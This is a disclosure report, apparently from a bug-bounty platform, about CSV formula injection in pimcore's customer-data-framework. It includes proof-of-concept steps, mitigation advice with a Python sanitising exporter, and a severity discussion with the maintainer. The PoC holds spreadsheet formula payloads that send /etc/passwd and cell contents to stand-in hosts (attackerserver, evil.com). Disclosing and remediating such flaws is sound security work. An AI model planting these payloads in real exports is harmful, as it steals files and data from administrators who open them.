Embedding untrusted input inside CSV files leads to Formula Injection/CSV Injection in pimcore/customer-data-framework
Reported on
Mar 22nd 2023
Description
The CSV export of pimcore/customer-data-framework is vulnerable to Formula Injection/CSV Injection via the Firstname, Lastname, Street, Zip & City fields of the customer registration form. Any attacker who can register an account stores a spreadsheet formula in these fields; when an administrator later exports the customer list as CSV and opens it in a spreadsheet application, the formula executes on the administrator's machine. The PoC below uses this to exfiltrate a local file and to redirect the administrator to an attacker-controlled site; depending on the spreadsheet application and its settings, the same vector can reach command execution.
Proof of Concept
1. Go to "https://demo.pimcore.fun/en/account/register" and register an account, inserting the payloads below in "Firstname" & "Lastname".
2. Payloads:
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc")
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
(The first payload uses LibreOffice Calc syntax: semicolons as argument separators and a 'file:///...'#$Sheet.Cell external reference to read a local file into the formula. Excel users need the equivalent Excel syntax.)
3. Start your Python HTTP server or netcat listener on attackerserver:port.
4. Then, from an admin account, go to "Customers" and click "Export Data in CSV Format".
5. Open the downloaded CSV in a spreadsheet application and click "poc" and "Error fetching info: Click me to resolve." The listener receives the contents of /etc/passwd from the admin's system, and the admin is redirected to evil.com.
PoC Video
https://drive.google.com/file/d/1SiberemDJyF4DyU5qBnd8Fdbyl5U82aZ/view?usp=share_link
Solutions
This attack is difficult to mitigate fully and is explicitly excluded from quite a few bug bounty programs, because the formula is evaluated by the spreadsheet application rather than by the web application. To remediate it on the export side, ensure that no cell begins with any of the following characters (the usual approach is to prefix such cells with a single quote so the spreadsheet treats them as text, wrap every cell in double quotes, and double any embedded double quotes; note that this also neutralises legitimate values such as negative numbers or phone numbers starting with "+"):
Equals to (=)
Plus (+)
Minus (-)
At (@)
Tab (0x09)
Carriage return (0x0D)
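The sanitisation described above, written out as an added example. This is not pimcore's fix (that is in the referenced pull request) and not code from this report; it is a small Python export routine that applies the character list above to every cell before writing the CSV. The field names, the sample rows and the whitespace-stripping in is_formula_like are assumptions made for the example.

```python
import csv
import io

# Characters that make a spreadsheet application treat a cell as a formula
# (the list from the Solutions section: = + - @ tab carriage-return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula.

    Leading spaces are stripped before the check. That is a conservative
    assumption for this example: not every importer trims cells, but
    flagging "  =1+1" costs nothing and closes an easy bypass.
    """
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def sanitize_cell(value) -> str:
    """Neutralise a single CSV cell.

    Formula-like strings are prefixed with a single quote, which spreadsheet
    applications read as "this cell is text". Non-string values (numbers
    coming from the database) are converted as-is, so a numeric -5 stays a
    number while the string "-5" typed by a user becomes "'-5".
    """
    if not isinstance(value, str):
        return str(value)
    if is_formula_like(value):
        return "'" + value
    return value


def export_csv(header, rows) -> str:
    """Render rows as CSV text with every cell sanitised and quoted.

    QUOTE_ALL keeps embedded commas, double quotes and CR/LF inside the cell
    (the csv module doubles embedded quotes), so a payload cannot break out
    of its field and start a new row or column of its own.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample data (not real customer records): the first row carries
# the first PoC payload from this report in the Firstname field.
SAMPLE_HEADER = ["Firstname", "Lastname", "Street", "Zip", "City"]
SAMPLE_ROWS = [
    ['=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; '
     '(\'file:///etc/passwd\'#$passwd.A1)); "poc")',
     "Doe", "1 Main St", "12345", "Springfield"],
    ["Alice", "Smith", "-3 Back Lane", "00100", "@home"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_HEADER, SAMPLE_ROWS))
```

Running the block prints the export with the payload cell rendered as "'=HYPERLINK(...)", which opens as inert text in Excel and LibreOffice Calc. The second sample row shows the trade-off mentioned above: "-3 Back Lane" and "@home" are harmless but are still prefixed, because the sanitiser cannot tell a street number from a formula.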
Impact
Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of confidential data contained in the export or on the administrator's machine.
References
@brusch The severity should be high for this report, as anyone can perform this attack; it doesn't need any privileged user to perform it.
But you have only authenticated users ... so actually it's not as serious. You also shared:
This attack is difficult to mitigate and is explicitly disallowed from quite a few bug bounty programs.
@brusch Thank you for your response. I understand that the vulnerability may require authentication, but it should be noted that anyone can sign up for the application and exploit the vulnerability, as demonstrated in this video: https://drive.google.com/file/d/1SiberemDJyF4DyU5qBnd8Fdbyl5U82aZ/view?usp=share_link
This significantly increases the risk and impact of the vulnerability and should be taken into consideration when evaluating its severity.
As I mentioned before, the vulnerability can be difficult to mitigate and is explicitly disallowed in other bug bounty programs. Additionally, other similar vulnerabilities in similar applications have been classified as high/critical severity. Please check the reports mentioned below, which were considered higher/critical severity for this vulnerability:
https://nvd.nist.gov/vuln/detail/CVE-2022-3600
https://nvd.nist.gov/vuln/detail/CVE-2022-28481
https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4/
If you score the vulnerability according to the exploitation, then it comes under the following severity: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Fixed in https://github.com/pimcore/customer-data-framework/pull/453 Unfortunately we can't reference it in the fix here, because it was reported to the wrong GitHub repository.
@admin can you maybe move this to https://github.com/pimcore/customer-data-framework or mark this as fixed, since we can't do this without referencing a commit hash. Thanks a lot!
@brusch Any update on the severity for this vulnerability?
Tagging @admin, as I am not getting any response from the admin side.
The repository reference has now been updated; you should be able to mark this as fixed without any issues now :)
@brusch @Maintainer Now you can mark it as fixed and update the CVSS scope if possible.